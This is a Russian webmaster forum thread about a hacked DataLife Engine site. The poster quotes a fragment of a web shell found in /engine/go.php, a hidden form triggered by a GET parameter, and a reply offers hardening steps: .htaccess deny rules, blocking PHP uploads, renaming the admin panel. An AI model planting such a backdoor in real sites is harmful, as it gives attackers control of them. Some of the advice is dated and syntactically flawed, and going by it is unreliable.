Вопрос про DLE!

DoctorSEO
На сайте с 13.11.2011
Offline
75
496

Здравствуйте! Че это такое? то сам index.php перестает работать (перезалил из бэкапа заработал), то какието 2 буквы в вверху сайта появились fg и нигде их найти не могу ни в шаблоне ни где, зашел в антивирус dle тоже не работает :gm: сайт: online-freebee.ru

DoctorSEO добавил 12.12.2011 в 17:29

Нашел шел в /engine/go.php

if(isset($_GET['tes'])) {

echo <<<HTML

<HTML><body><form action="" method="post">

<center><textarea name="text" rows="10" cols="100"></textarea>

<br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML>

HTML;

Проверяйте свои сайты!!

DoctorSEO добавил 12.12.2011 в 18:57

Как в DLE защитится от шелов и прочей беды?

TakingBackMySoul
На сайте с 09.11.2011
Offline
65
#1

добавьте .htaccess в папки uploads и templates, пропишите в нем

<FilesMatch>

Order allow,deny
Deny from all
</FilesMatch>

потом найдите в файле engine/inc/files.php

фрагмент:

$allowed_extensions = array ("gif", "jpg", "png", "jpe", "jpeg" );

$allowed_video = array ("avi", "mp4", "wmv", "mpg", "flv", "mp3", "swf", "m4v", "m4a", "mov", "3gp", "f4v" );
$allowed_files = explode( ',', strtolower( $config['files_type'] ) );
$img_result_th = "";
$img_result = "";

и замените его на:

$allowed_extensions = array ("gif", "jpg", "png", "jpe", "jpeg" );

$allowed_video = array ("avi", "mp4", "wmv", "mpg", "flv", "mp3", "swf", "m4v", "m4a", "mov", "3gp", "f4v" );
$allow_conf = str_replace("php",md5(time() - rand(30,60)),strtolower( $config['files_type'] ));
$allowed_files = explode( ',', $allow_conf );
$img_result_th = "";
$img_result = "";

потом создайте .htaccess в папке backup и туда пропишите:

Order Deny,Allow

Deny from all

Переименуйте админку и файл admin.php

это защитит не только от шеллов но и от захайженных линков.

DoctorSEO
На сайте с 13.11.2011
Offline
75
#2
TakingBackMySoul:
добавьте .htaccess в папки uploads и templates, пропишите в нем
<FilesMatch>

Order allow,deny
Deny from all
</FilesMatch>


потом найдите в файле engine/inc/files.php

фрагмент:
$allowed_extensions = array ("gif", "jpg", "png", "jpe", "jpeg" );

$allowed_video = array ("avi", "mp4", "wmv", "mpg", "flv", "mp3", "swf", "m4v", "m4a", "mov", "3gp", "f4v" );
$allowed_files = explode( ',', strtolower( $config['files_type'] ) );
$img_result_th = "";
$img_result = "";


и замените его на:
$allowed_extensions = array ("gif", "jpg", "png", "jpe", "jpeg" );

$allowed_video = array ("avi", "mp4", "wmv", "mpg", "flv", "mp3", "swf", "m4v", "m4a", "mov", "3gp", "f4v" );
$allow_conf = str_replace("php",md5(time() - rand(30,60)),strtolower( $config['files_type'] ));
$allowed_files = explode( ',', $allow_conf );
$img_result_th = "";
$img_result = "";


потом создайте .htaccess в папке backup и туда пропишите:
Order Deny,Allow

Deny from all


Переименуйте админку и файл admin.php

это защитит не только от шеллов но и от захайженных линков.

Спасибооооо! А какой скрипт могли загрузить через шел в go.php, шела удалил, а какойто скрипт остался(((

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий